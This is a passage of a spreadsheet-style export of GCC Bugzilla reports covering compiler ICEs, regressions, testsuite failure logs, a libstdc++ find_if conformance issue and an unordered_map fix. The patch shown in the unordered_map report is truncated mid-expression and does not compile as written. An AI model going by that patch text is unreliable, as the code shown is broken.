FAIL:    gfortran.fortran-torture/execute/in-pack.f90 execution  -O3 -g 
on armeb-none-linux-gnueabihf
--with-mode arm
--with-cpu cortex-a9
--with-fpu neon-fp16
O0 O1 O2* -Os still pass.</t>
  </si>
  <si>
    <t>GCC-6796</t>
  </si>
  <si>
    <t>[True64 5.0A] gcc 3.1: ICE on bootstrap (stage2/xgcc predict.c)</t>
  </si>
  <si>
    <t>Bootstrapping gcc 3.1 on Tru64 Unix 5.0A PK3 fails with an ICE on predict.c:
- --- snip ---
stage2/xgcc -Bstage2/ -B/net/usr/opt/public/gcc-3.1/osf/alphaev56-dec-osf5.0/bin
/ -c -DIN_GCC    -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-p
rototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H    -I. -I. -I/
net/hmi/dta/source/gcc-3.1/gcc -I/net/hmi/dta/source/gcc-3.1/gcc/. -I/net/hmi/dt
a/source/gcc-3.1/gcc/config -I/net/hmi/dta/source/gcc-3.1/gcc/../include /net/hm
i/dta/source/gcc-3.1/gcc/params.c -o params.o
stage2/xgcc -Bstage2/ -B/net/usr/opt/public/gcc-3.1/osf/alphaev56-dec-osf5.0/bin
/ -c -DIN_GCC    -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-p
rototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H    -I. -I. -I/
net/hmi/dta/source/gcc-3.1/gcc -I/net/hmi/dta/source/gcc-3.1/gcc/. -I/net/hmi/dt
a/source/gcc-3.1/gcc/config -I/net/hmi/dta/source/gcc-3.1/gcc/../include /net/hm
i/dta/source/gcc-3.1/gcc/predict.c -o predict.o
/net/hmi/dta/source/gcc-3.1/gcc/predict.c: In function `propagate_freq':
/net/hmi/dta/source/gcc-3.1/gcc/predict.c:708: Internal compiler error in @
                                                                           @ at
 F:537425872
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[2]: *** [predict.o] Error 1
- --- snap ---
The configure line was:
env CC=/usr/bin/cc /net/hmi/dta/source/gcc-3.1/configure --prefix=/net/pub/gcc-3.1 --exec-prefix=/net/pub/gcc-3.1/osf --enable-shared --enable-languages=c++f77
Adding -v -save-temps to the compiler options yields:
--- snip ---
 stage2/xgcc -v -save-temps -Bstage2/ -B/net/usr/opt
/public/gcc-3.1/osf/alphaev56-dec-osf5.0/bin/ -c -DIN_GCC -g -O2 -W -Wall -Wwrit
e-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-
long-long -DHAVE_CONFIG_H -I. -I. -I/net/hmi/dta/source/gcc-3.1/gcc -I/net/hmi/d
ta/source/gcc-3.1/gcc/. -I/net/hmi/dta/source/gcc-3.1/gcc/config -I/net/hmi/dta/
source/gcc-3.1/gcc/../include /net/hmi/dta/source/gcc-3.1/gcc/predict.c -o predi
ct.o
Reading specs from stage2/specs
Configured with: /net/hmi/dta/source/gcc-3.1/configure --prefix=/net/usr/opt/pub
lic/gcc-3.1 --exec-prefix=/net/usr/opt/public/gcc-3.1/osf --enable-shared --enab
le-languages=c++f77
Thread model: single
gcc version 3.1
 stage2/cpp0 -lang-c -v -I. -I. -I/net/hmi/dta/source/gcc-3.1/gcc -I/net/hmi/dta
/source/gcc-3.1/gcc/. -I/net/hmi/dta/source/gcc-3.1/gcc/config -I/net/hmi/dta/so
urce/gcc-3.1/gcc/../include -iprefix stage2/../lib/gcc-lib/alphaev56-dec-osf5.0/
3.1/ -isystem include -isystem stage2/include -isystem /net/usr/opt/public/gcc-3
.1/osf/alphaev56-dec-osf5.0/bin/include -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC
_PATCHLEVEL__=0 -Dunix -D__osf__ -D_LONGLONG -DSYSTYPE_BSD -D_SYSTYPE_BSD -D__un
ix__ -D__osf__ -D_LONGLONG -D__SYSTYPE_BSD__ -D_SYSTYPE_BSD -D__unix -D__SYSTYPE
_BSD -Asystem=unix -Asystem=xpg4 -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D__LANGUAGE
_C__ -D__LANGUAGE_C -DLANGUAGE_C -Acpu=alpha -Amachine=alpha -D__alpha -D__alpha
__ -D__alpha_ev5__ -Acpu=ev5 -D__alpha_bwx__ -Acpu=bwx -D__X_FLOAT -D__EXTERN_PR
EFIX -DIN_GCC -DHAVE_CONFIG_H /net/hmi/dta/source/gcc-3.1/gcc/predict.c -W -Wall
 -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -Wno-lon
g-long -pedantic predict.i
ignoring nonexistent directory stage2/include
ignoring nonexistent directory /net/usr/opt/public/gcc-3.1/osf/alphaev56-dec-os
f5.0/bin/include
GNU CPP version 3.1 (cpplib)
ignoring nonexistent directory lib/gcc-lib/alphaev56-dec-osf5.0/3.1/include
ignoring nonexistent directory lib/gcc-lib/alphaev56-dec-osf5.0/3.1/../../../..
/alphaev56-dec-osf5.0/include
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /net/usr/opt/public/gcc-3.1/include
ignoring nonexistent directory /net/usr/opt/public/gcc-3.1/osf/lib/gcc-lib/alph
aev56-dec-osf5.0/3.1/include
ignoring nonexistent directory /net/usr/opt/public/gcc-3.1/osf/lib/gcc-lib/alph
aev56-dec-osf5.0/3.1/../../../../alphaev56-dec-osf5.0/include
ignoring duplicate directory .
ignoring duplicate directory /net/hmi/dta/source/gcc-3.1/gcc
#include ... search starts here:
#include  search starts here:
 .
 /net/hmi/dta/source/gcc-3.1/gcc
 /net/hmi/dta/source/gcc-3.1/gcc/config
 /net/hmi/dta/source/gcc-3.1/include
 include
 /usr/include
End of search list.
 stage2/cc1 -fpreprocessed predict.i -quiet -dumpbase predict.c -g -O2 -W -Wall 
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -Wno-long
-long -pedantic -version -o predict.s
GNU CPP version 3.1 (cpplib)
GNU C version 3.1 (alphaev56-dec-osf5.0)
        compiled by GNU C version 3.1.
/net/hmi/dta/source/gcc-3.1/gcc/predict.c: In function `propagate_freq':
/net/hmi/dta/source/gcc-3.1/gcc/predict.c:708: Internal compiler error in @
                                                                           @ at
 F:537425872
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
- --- snap ---
gzip'ed predict.i is attached.
Release:
unknown
Environment:
Tru64 Unix 5.0A (Rev. 1094) PK3
on Compaq AlphaServer 1200 5/533 (1xEV5.6@533MHz)
How-To-Repeat:
Bootstrap gcc 3.1 (as described) on Tru64 Unix 5.0A PK3</t>
  </si>
  <si>
    <t>GCC-54860</t>
  </si>
  <si>
    <t>[4.8 Regression]: build fails when configuring libgfortran due to recent attribute changes in core gcc</t>
  </si>
  <si>
    <t>Created attachment 28393
Repeat with gccobj/./gcc/f951 conftest.f -ffixed-form
A patch in the revision range (last_known_working:first_known_failing) 192197:192199 caused the build for cris-elf to fail as follows:
...
checking whether the /tmp/build20121008/gccobj/./gcc/gfortran -B/tmp/build20121008/gccobj/./gcc/ -nostdinc -B/tmp/build20121008/gccobj/cris-elf/newlib/ -isystem /tmp/build20121008/gccobj/cris-elf/newlib/targ-include -isystem /tmp/build20121008/gcc/newlib/libc/include -B/tmp/build20121008/gccobj/cris-elf/libgloss/cris -L/tmp/build20121008/gccobj/cris-elf/libgloss/libnosys -L/tmp/build20121008/gcc/libgloss/cris -B/tmp/build20121008/pre/cris-elf/bin/ -B/tmp/build20121008/pre/cris-elf/lib/ -isystem /tmp/build20121008/pre/cris-elf/include -isystem /tmp/build20121008/pre/cris-elf/sys-include    linker (/tmp/build20121008/gccobj/./gcc/collect-ld) supports shared libraries... yes
checking dynamic linker characteristics... no
checking how to hardcode library paths into programs... immediate
checking whether the GNU Fortran compiler is working... no
configure: error: GNU Fortran is not working please report a bug in http://gcc.gnu.org/bugzilla attaching /tmp/build20121008/gccobj/cris-elf/libgfortran/config.log
make[1]: *** [configure-target-libgfortran] Error 1
make[1]: Leaving directory `/tmp/build20121008/gccobj'
In that config.log:
configure:12882: /tmp/build20121008/gccobj/./gcc/gfortran -B/tmp/build20121008/gccobj/./gcc/ -nostdinc -B/tmp/build20121008/gccobj/cris-elf/newlib/ -isystem /tmp/build20121008/gccobj/cris-elf/newlib/targ-include -isystem /tmp/build20121008/gcc/newlib/libc/include -B/tmp/build20121008/gccobj/cris-elf/libgloss/cris -L/tmp/build20121008/gccobj/cris-elf/libgloss/libnosys -L/tmp/build20121008/gcc/libgloss/cris -B/tmp/build20121008/pre/cris-elf/bin/ -B/tmp/build20121008/pre/cris-elf/lib/ -isystem /tmp/build20121008/pre/cris-elf/include -isystem /tmp/build20121008/pre/cris-elf/sys-include    -c -g  conftest.f &gt;&amp;5
f951: internal compiler error: Segmentation fault
0x89f135 crash_signal
        /tmp/build20121008/gcc/gcc/toplev.c:335
0xbcd90a htab_mod
        /tmp/build20121008/gcc/libiberty/hashtab.c:272
0xbcd90a htab_find_with_hash
        /tmp/build20121008/gcc/libiberty/hashtab.c:602
0xbd0068 lookup_scoped_attribute_spec(tree_node const* tree_node const*)
        /tmp/build20121008/gcc/gcc/attribs.c:325
0xa69645 comp_type_attributes(tree_node const* tree_node const*)
        /tmp/build20121008/gcc/gcc/tree.c:4353
0xa69a10 build_type_attribute_qual_variant(tree_node* tree_node* int)
        /tmp/build20121008/gcc/gcc/tree.c:4302
0x564203 build_library_function_decl_1
        /tmp/build20121008/gcc/gcc/fortran/trans-decl.c:2650
0x56437c gfc_build_library_function_decl_with_spec(tree_node* char const* tree_node* int ...)
        /tmp/build20121008/gcc/gcc/fortran/trans-decl.c:2692
0x5644e3 gfc_build_builtin_function_decls()
        /tmp/build20121008/gcc/gcc/fortran/trans-decl.c:3067
0x545b7d gfc_create_decls
        /tmp/build20121008/gcc/gcc/fortran/f95-lang.c:175
0x545b7d gfc_be_parse_file
        /tmp/build20121008/gcc/gcc/fortran/f95-lang.c:190
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
configure:12882: $? = 1
configure: failed program was:
|       program main
| 
|       end
Configure-test-code and command-line attached.
Author of only suspect patch in revision range CC:ed.
Just configure for --target=cris-elf and make all-gcc to produce f951.</t>
  </si>
  <si>
    <t>GCC-44885</t>
  </si>
  <si>
    <t>[4.6 regression] miscompilation of gnat.dg/aliasing3.adb after mem-ref2</t>
  </si>
  <si>
    <t>There is a regression in gnat.dg visible on various 32-bit platforms:
  http://gcc.gnu.org/ml/gcc-testresults/2010-07/msg00744.html
  http://gcc.gnu.org/ml/gcc-testresults/2010-07/msg00743.html
  http://gcc.gnu.org/ml/gcc-testresults/2010-07/msg00709.html
The problem is that the new code seems to overlook TYPE_NONALIASED_COMPONENT when building the MEM_REF and thus gives the wrong alias set to the RTL mem causing aliasing memory references to be swapped by the scheduler.</t>
  </si>
  <si>
    <t>GCC-31556</t>
  </si>
  <si>
    <t>find_if uses operator! instead of conversion to bool</t>
  </si>
  <si>
    <t>Section 25 lib.algorithms paragraph 7 defines the Predicate parameter in std::find_if and others as returning a value that need only be usable in the controlling-expression of an if statement. libstdc++'s find_if incorrectly relies on the operator! function which may not be usable.
In a case where operator! is private this error results:
test.c: In function `_InputIterator std::__find_if(_InputIterator _InputIterator _Predicate std::input_iterator_tag) [with _InputIterator = std::_List_iterator _Predicate = my_bool (*)(double)]':
.../include/c++/4.1.1/bits/stl_algo.h:338:   instantiated from `_InputIterator std::find_if(_InputIterator _InputIterator _Predicate) [with _InputIterator = std::_List_iterator _Predicate = my_bool (*)(double)]'
test.c:16:   instantiated from here
test.c:7: error: `bool my_bool::operator!() const' is private
.../include/c++/4.1.1/bits/stl_algo.h:188: error: within this context</t>
  </si>
  <si>
    <t>GCC-25578</t>
  </si>
  <si>
    <t>[4.2 Regression] gfortran  version 4.2.0 20051227 - 144 new testsuite failures since 2005121</t>
  </si>
  <si>
    <t>The 20051227 version of gfortran has 144 new testsuite failures as compared to the 2005121 version -
Test Run By dir on Tue Dec 27 11:07:49 2005
Native configuration is powerpc-apple-darwin8.3.0
                === gfortran tests ===
Schedule of variations:
    unix
Running target unix
Using /usr/local/share/dejagnu/baseboards/unix.exp as board description file for target.
Using /usr/local/share/dejagnu/config/unix.exp as generic interface file for target.
Using /Users/dir/gfortran/gcc/gcc/testsuite/config/default.exp as tool-and-target-specific interface file.
Running /Users/dir/gfortran/gcc/gcc/testsuite/gfortran.dg/dg.exp ...
FAIL: gfortran.dg/complex_intrinsic_1.f90 execution test
FAIL: gfortran.dg/complex_intrinsic_1.f90 execution test
FAIL: gfortran.dg/complex_intrinsic_1.f90 execution test
FAIL: gfortran.dg/complex_intrinsic_1.f90 execution test
FAIL: gfortran.dg/complex_intrinsic_1.f90 execution test
FAIL: gfortran.dg/complex_intrinsic_1.f90 execution test
FAIL: gfortran.dg/complex_intrinsic_1.f90 execution test
FAIL: gfortran.dg/complex_intrinsic_1.f90 execution test
FAIL: gfortran.dg/f2c_2.f90 execution test
FAIL: gfortran.dg/f2c_2.f90 execution test
FAIL: gfortran.dg/f2c_2.f90 execution test
FAIL: gfortran.dg/f2c_2.f90 execution test
FAIL: gfortran.dg/f2c_2.f90 execution test
FAIL: gfortran.dg/f2c_2.f90 execution test
FAIL: gfortran.dg/f2c_2.f90 execution test
FAIL: gfortran.dg/f2c_2.f90 execution test
FAIL: gfortran.dg/int_1.f90 execution test
FAIL: gfortran.dg/int_1.f90 execution test
FAIL: gfortran.dg/int_1.f90 execution test
FAIL: gfortran.dg/int_1.f90 execution test
FAIL: gfortran.dg/int_1.f90 execution test
FAIL: gfortran.dg/int_1.f90 execution test
FAIL: gfortran.dg/int_1.f90 execution test
FAIL: gfortran.dg/int_1.f90 execution test
FAIL: gfortran.dg/large_real_kind_2.F90 execution test
FAIL: gfortran.dg/large_real_kind_2.F90 execution test
FAIL: gfortran.dg/large_real_kind_2.F90 execution test
FAIL: gfortran.dg/large_real_kind_2.F90 execution test
FAIL: gfortran.dg/large_real_kind_2.F90 execution test
FAIL: gfortran.dg/large_real_kind_2.F90 execution test
FAIL: gfortran.dg/large_real_kind_2.F90 execution test
FAIL: gfortran.dg/large_real_kind_2.F90 execution test
FAIL: gfortran.dg/list_read_4.f90 execution test
FAIL: gfortran.dg/list_read_4.f90 execution test
FAIL: gfortran.dg/list_read_4.f90 execution test
FAIL: gfortran.dg/list_read_4.f90 execution test
FAIL: gfortran.dg/list_read_4.f90 execution test
FAIL: gfortran.dg/list_read_4.f90 execution test
FAIL: gfortran.dg/list_read_4.f90 execution test
FAIL: gfortran.dg/list_read_4.f90 execution test
FAIL: gfortran.dg/nested_modules_1.f90 execution test
FAIL: gfortran.dg/nested_modules_1.f90 execution test
FAIL: gfortran.dg/nested_modules_1.f90 execution test
FAIL: gfortran.dg/nested_modules_1.f90 execution test
FAIL: gfortran.dg/nested_modules_1.f90 execution test
FAIL: gfortran.dg/nested_modules_1.f90 execution test
FAIL: gfortran.dg/nested_modules_1.f90 execution test
FAIL: gfortran.dg/nested_modules_1.f90 execution test
FAIL: gfortran.dg/real_const_1.f execution test
FAIL: gfortran.dg/real_const_1.f execution test
FAIL: gfortran.dg/real_const_1.f execution test
FAIL: gfortran.dg/real_const_1.f execution test
FAIL: gfortran.dg/real_const_1.f execution test
FAIL: gfortran.dg/real_const_1.f execution test
FAIL: gfortran.dg/real_const_1.f execution test
FAIL: gfortran.dg/real_const_1.f execution test
FAIL: gfortran.dg/real_const_2.f90 execution test
FAIL: gfortran.dg/real_const_2.f90 execution test
FAIL: gfortran.dg/real_const_2.f90 execution test
FAIL: gfortran.dg/real_const_2.f90 execution test
FAIL: gfortran.dg/real_const_2.f90 execution test
FAIL: gfortran.dg/real_const_2.f90 execution test
FAIL: gfortran.dg/real_const_2.f90 execution test
FAIL: gfortran.dg/real_const_2.f90 execution test
FAIL: gfortran.dg/g77/947.f execution test
FAIL: gfortran.dg/g77/947.f execution test
FAIL: gfortran.dg/g77/947.f execution test
FAIL: gfortran.dg/g77/947.f execution test
FAIL: gfortran.dg/g77/947.f execution test
FAIL: gfortran.dg/g77/947.f execution test
FAIL: gfortran.dg/g77/947.f execution test
FAIL: gfortran.dg/g77/947.f execution test
FAIL: gfortran.dg/g77/complex_1.f execution test
FAIL: gfortran.dg/g77/complex_1.f execution test
FAIL: gfortran.dg/g77/complex_1.f execution test
FAIL: gfortran.dg/g77/complex_1.f execution test
FAIL: gfortran.dg/g77/complex_1.f execution test
FAIL: gfortran.dg/g77/complex_1.f execution test
FAIL: gfortran.dg/g77/complex_1.f execution test
FAIL: gfortran.dg/g77/complex_1.f execution test
FAIL: gfortran.dg/g77/dcomplex.f execution test
FAIL: gfortran.dg/g77/dcomplex.f execution test
FAIL: gfortran.dg/g77/dcomplex.f execution test
FAIL: gfortran.dg/g77/dcomplex.f execution test
FAIL: gfortran.dg/g77/dcomplex.f execution test
FAIL: gfortran.dg/g77/dcomplex.f execution test
FAIL: gfortran.dg/g77/dcomplex.f execution test
FAIL: gfortran.dg/g77/dcomplex.f execution test
FAIL: gfortran.dg/g77/f90-intrinsic-numeric.f execution test
FAIL: gfortran.dg/g77/f90-intrinsic-numeric.f execution test
FAIL: gfortran.dg/g77/f90-intrinsic-numeric.f execution test
FAIL: gfortran.dg/g77/f90-intrinsic-numeric.f execution test
FAIL: gfortran.dg/g77/f90-intrinsic-numeric.f execution test
FAIL: gfortran.dg/g77/f90-intrinsic-numeric.f execution test
FAIL: gfortran.dg/g77/f90-intrinsic-numeric.f execution test
FAIL: gfortran.dg/g77/f90-intrinsic-numeric.f execution test
Running /Users/dir/gfortran/gcc/gcc/testsuite/gfortran.dg/vect/vect.exp ...
Running /Users/dir/gfortran/gcc/gcc/testsuite/gfortran.fortran-torture/compile/compile.exp ...
Running /Users/dir/gfortran/gcc/gcc/testsuite/gfortran.fortran-torture/execute/execute.exp ...
FAIL: gfortran.fortran-torture/execute/cmplx.f90 execution  -O0 
FAIL: gfortran.fortran-torture/execute/cmplx.f90 execution  -O1 
FAIL: gfortran.fortran-torture/execute/cmplx.f90 execution  -O2 
FAIL: gfortran.fortran-torture/execute/cmplx.f90 execution  -O3 -fomit-frame-pointer 
FAIL: gfortran.fortran-torture/execute/cmplx.f90 execution  -O3 -fomit-frame-pointer -funroll-loops 
FAIL: gfortran.fortran-torture/execute/cmplx.f90 execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gfortran.fortran-torture/execute/cmplx.f90 execution  -O3 -g 
FAIL: gfortran.fortran-torture/execute/cmplx.f90 execution  -Os 
FAIL: gfortran.fortran-torture/execute/intrinsic_dotprod.f90 execution  -O0 
FAIL: gfortran.fortran-torture/execute/intrinsic_dotprod.f90 execution  -O1 
FAIL: gfortran.fortran-torture/execute/intrinsic_dotprod.f90 execution  -O2 
FAIL: gfortran.fortran-torture/execute/intrinsic_dotprod.f90 execution  -O3 -fomit-frame-pointer 
FAIL: gfortran.fortran-torture/execute/intrinsic_dotprod.f90 execution  -O3 -fomit-frame-pointer -funroll-loops 
FAIL: gfortran.fortran-torture/execute/intrinsic_dotprod.f90 execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gfortran.fortran-torture/execute/intrinsic_dotprod.f90 execution  -O3 -g 
FAIL: gfortran.fortran-torture/execute/intrinsic_dotprod.f90 execution  -Os 
FAIL: gfortran.fortran-torture/execute/intrinsic_minmax.f90 execution  -O0 
FAIL: gfortran.fortran-torture/execute/intrinsic_minmax.f90 execution  -O1 
FAIL: gfortran.fortran-torture/execute/intrinsic_minmax.f90 execution  -O2 
FAIL: gfortran.fortran-torture/execute/intrinsic_minmax.f90 execution  -O3 -fomit-frame-pointer 
FAIL: gfortran.fortran-torture/execute/intrinsic_minmax.f90 execution  -O3 -fomit-frame-pointer -funroll-loops 
FAIL: gfortran.fortran-torture/execute/intrinsic_minmax.f90 execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gfortran.fortran-torture/execute/intrinsic_minmax.f90 execution  -O3 -g 
FAIL: gfortran.fortran-torture/execute/intrinsic_minmax.f90 execution  -Os 
FAIL: gfortran.fortran-torture/execute/intrinsic_mod_ulo.f90 execution  -O0 
FAIL: gfortran.fortran-torture/execute/intrinsic_mod_ulo.f90 execution  -O1 
FAIL: gfortran.fortran-torture/execute/intrinsic_mod_ulo.f90 execution  -O2 
FAIL: gfortran.fortran-torture/execute/intrinsic_mod_ulo.f90 execution  -O3 -fomit-frame-pointer 
FAIL: gfortran.fortran-torture/execute/intrinsic_mod_ulo.f90 execution  -O3 -fomit-frame-pointer -funroll-loops 
FAIL: gfortran.fortran-torture/execute/intrinsic_mod_ulo.f90 execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gfortran.fortran-torture/execute/intrinsic_mod_ulo.f90 execution  -O3 -g 
FAIL: gfortran.fortran-torture/execute/intrinsic_mod_ulo.f90 execution  -Os 
FAIL: gfortran.fortran-torture/execute/math.f90 execution  -O0 
FAIL: gfortran.fortran-torture/execute/math.f90 execution  -O1 
FAIL: gfortran.fortran-torture/execute/math.f90 execution  -O2 
FAIL: gfortran.fortran-torture/execute/math.f90 execution  -O3 -fomit-frame-pointer 
FAIL: gfortran.fortran-torture/execute/math.f90 execution  -O3 -fomit-frame-pointer -funroll-loops 
FAIL: gfortran.fortran-torture/execute/math.f90 execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gfortran.fortran-torture/execute/math.f90 execution  -O3 -g 
FAIL: gfortran.fortran-torture/execute/math.f90 execution  -Os 
FAIL: gfortran.fortran-torture/execute/parameter_2.f90 execution  -O0 
FAIL: gfortran.fortran-torture/execute/parameter_2.f90 execution  -O1 
FAIL: gfortran.fortran-torture/execute/parameter_2.f90 execution  -O2 
FAIL: gfortran.fortran-torture/execute/parameter_2.f90 execution  -O3 -fomit-frame-pointer 
FAIL: gfortran.fortran-torture/execute/parameter_2.f90 execution  -O3 -fomit-frame-pointer -funroll-loops 
FAIL: gfortran.fortran-torture/execute/parameter_2.f90 execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gfortran.fortran-torture/execute/parameter_2.f90 execution  -O3 -g 
FAIL: gfortran.fortran-torture/execute/parameter_2.f90 execution  -Os 
FAIL: gfortran.fortran-torture/execute/power.f90 execution  -O0 
FAIL: gfortran.fortran-torture/execute/power.f90 execution  -O1 
FAIL: gfortran.fortran-torture/execute/power.f90 execution  -O2 
FAIL: gfortran.fortran-torture/execute/power.f90 execution  -O3 -fomit-frame-pointer 
FAIL: gfortran.fortran-torture/execute/power.f90 execution  -O3 -fomit-frame-pointer -funroll-loops 
FAIL: gfortran.fortran-torture/execute/power.f90 execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gfortran.fortran-torture/execute/power.f90 execution  -O3 -g 
FAIL: gfortran.fortran-torture/execute/power.f90 execution  -Os 
                === gfortran Summary ===
# of expected passes            10856
# of unexpected failures        152
# of expected failures          7
# of unsupported tests          42
/Users/dir/gfortran/ibin/stage3-gcc/testsuite/../gfortran  version 4.2.0 20051227 (experimental)</t>
  </si>
  <si>
    <t>GCC-27385</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] ICE with invalid array initializer</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 4.1.0
(and in GCC 3.3 3.3.1 3.3.2):
========================
struct A {}
A a[] = { 0 }
========================
The compiler loops forever until it runs out of memory:
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
bug.cc:3: error: initializer for 'A' must be brace-enclosed
[etc.]</t>
  </si>
  <si>
    <t>GCC-63456</t>
  </si>
  <si>
    <t>unordered_map incorrectly frees _M_single_bucket. Patch Included</t>
  </si>
  <si>
    <t>I am sorry I do not have a simple reproduction for this failure. It cropped up in the middle of a rather large project. However I traced it to this function which can't possibly be right:
_M_uses_single_bucket(__bkts) does not use the value of __bkts but only tests the value of _M_buckets. Fixing it resolves my issue.
patch below:
--- a/hashtable.h	2014-10-03 21:10:56.732842012 -0700
+++ b/hashtable.h	2014-10-03 21:23:45.924860775 -0700
@@ -3267 +3267 @@
       bool
       _M_uses_single_bucket(__bucket_type* __bkts) const
-      { return __builtin_expect(_M_buckets ==  }
+      { return __builtin_expect(__bkts ==  }
       bool
       _M_uses_single_bucket() const</t>
  </si>
  <si>
    <t>ylow</t>
  </si>
  <si>
    <t>GCC-52011</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/lto/trans-mem-* c_lto_trans-mem-*.o assemble -flto -fgnu-tm in 32 bit mode</t>
  </si>
  <si>
    <t>The following tests fail in 32 bit mode
FAIL: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_1.o assemble -flto -fgnu-tm
FAIL: gcc.dg/lto/trans-mem-2 c_lto_trans-mem-2_0.o assemble -flto -fgnu-tm
FAIL: gcc.dg/lto/trans-mem-3 c_lto_trans-mem-3_1.o assemble -flto
FAIL: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_1.o assemble -flto -fgnu-tm
FAIL: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o link -flto -fgnu-tm
UNRESOLVED: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o execute -flto -fgnu-tm
(see http://gcc.gnu.org/ml/gcc-testresults/2012-01/msg02599.html through the guality mess). The errors are (from http://glutton.geoffk.org/HEAD/native-logsum/gcc/testsuite/gcc/gcc.log.gzip )
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/   -flto -fgnu-tm  -c  -o c_lto_trans-mem-1_0.o /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_0.c    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_0.o assemble -flto -fgnu-tm
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/   -flto -fgnu-tm  -c  -o c_lto_trans-mem-1_1.o /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c    (timeout = 300)
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c:5:19: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c:6:15: warning: conflicting types for built-in function '_ITM_commitTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c:7:15: warning: conflicting types for built-in function '_ITM_WU4' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c:8:15: warning: conflicting types for built-in function '_ITM_WU8' [enabled by default]
output is:
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c:5:19: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c:6:15: warning: conflicting types for built-in function '_ITM_commitTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c:7:15: warning: conflicting types for built-in function '_ITM_WU4' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c:8:15: warning: conflicting types for built-in function '_ITM_WU8' [enabled by default]
FAIL: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_1.o assemble -flto -fgnu-tm
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/ c_lto_trans-mem-1_0.o c_lto_trans-mem-1_1.o   -flto -fgnu-tm       -o gcc-dg-lto-trans-mem-1-01.exe    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_0.o-c_lto_trans-mem-1_1.o link -flto -fgnu-tm
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/   -flto -fgnu-tm  -c  -o c_lto_trans-mem-2_0.o /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c    (timeout = 300)
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c:11:19: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c:12:15: warning: conflicting types for built-in function '_ITM_commitTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c:13:15: warning: conflicting types for built-in function '_ITM_WU4' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c:14:15: warning: conflicting types for built-in function '_ITM_WU8' [enabled by default]
output is:
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c:11:19: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]
